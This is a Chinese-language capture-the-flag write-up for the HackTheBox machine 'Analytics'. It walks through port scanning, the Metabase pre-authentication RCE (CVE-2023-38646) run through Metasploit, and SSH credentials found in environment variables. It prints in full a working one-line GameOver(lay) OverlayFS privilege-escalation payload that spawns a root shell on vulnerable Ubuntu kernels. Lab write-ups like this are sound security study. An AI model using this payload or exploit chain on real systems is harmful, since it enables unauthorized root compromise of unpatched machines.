信息搜集
1 | sudo nmap -p- -min-rate 10000 10.10.11.233 |
/etc/hosts
1 | 10.10.11.233 analytical.htb |

user-metabase
发现 Metabase 有一个最近披露的预身份验证 RCE 漏洞;CVE-2023-38646
该系统在0.46.6.1之前的开源版本和1.46.6.1之前的企业版本中存在漏洞。
/api/session/properties(无需授权也可访问)泄露setup-token;
我这里直接用msf;
1 | ┌──(kali㉿kali)-[~] |
user-metalytics
敏感信息藏得挺深的,居然在环境变量里面;
1 | env |
中发现
1 | META_USER=metalytics |
ssh登陆成功
1 | ssh metalytics@10.10.11.233 |
user-root
sudo -l没有利用点
1 | metalytics@analytics:~$ sudo -l |
suid没有利用点
1 | metalytics@analytics:~$ find / -perm -4000 2>/dev/null |
uname -a
1 | Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux |
使用 CVE-2023-2640 和 CVE-2023-32629 获取非 Root 容器的 Root 权限,又名 GameOver(lay)
payload只有一行
1 | unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")' |
Vulnerable kernels
| Kernel version | Ubuntu release |
|---|---|
| 6.2.0 | Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish) |
| 5.19.0 | Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish) |
| 5.4.0 | Ubuntu 22.04 LTS (Local Fossa) / Ubuntu 18.04 LTS (Bionic Beaver) |
总结
耐心,坚持,研究和技术技能的结合让我实现了目标。
